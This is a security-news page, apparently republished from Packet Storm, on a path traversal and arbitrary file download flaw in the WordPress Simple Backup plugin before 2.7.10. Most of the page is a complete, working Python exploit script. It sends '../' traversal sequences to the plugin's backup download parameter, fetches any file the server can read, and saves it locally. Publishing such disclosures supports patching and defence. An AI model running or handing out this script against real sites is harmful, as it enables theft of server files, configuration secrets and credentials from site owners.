Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress Simple Backup Path Traversal / Arbitrary File Download

WordPress Simple Backup plugin versions prior to 2.7.10 suffer from file download and path traversal vulnerabilities.

Packet Storm
#vulnerability#linux#wordpress#php#auth
# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal# Date: 2024-03-06# Exploit Author: Ven3xy# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip# Version: 2.7.10# Tested on: Linuximport sysimport requestsfrom urllib.parse import urljoinimport timedef exploit(target_url, file_name, depth):    traversal = '../' * depth    exploit_url = urljoin(target_url, '/wp-admin/tools.php')    params = {        'page': 'backup_manager',        'download_backup_file': f'{traversal}{file_name}'    }    response = requests.get(exploit_url, params=params)    if response.status_code == 200 and response.headers.get('Content-Disposition') \            and 'attachment; filename' in response.headers['Content-Disposition'] \            and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:        print(response.text)  # Replace with the desired action for the downloaded content        file_path = f'simplebackup_{file_name}'        with open(file_path, 'wb') as file:            file.write(response.content)        print(f'File saved in: {file_path}')    else:        print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")if __name__ == "__main__":    if len(sys.argv) != 4:        print("Usage: python exploit.py <target_url> <file_name> <depth>")        sys.exit(1)    target_url = sys.argv[1]    file_name = sys.argv[2]    depth = int(sys.argv[3])    print("\n[+] Exploit Coded By - Venexy    ||    Simple Backup Plugin 2.7.10  EXPLOIT\n\n")    time.sleep(5)    exploit(target_url, file_name, depth)

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution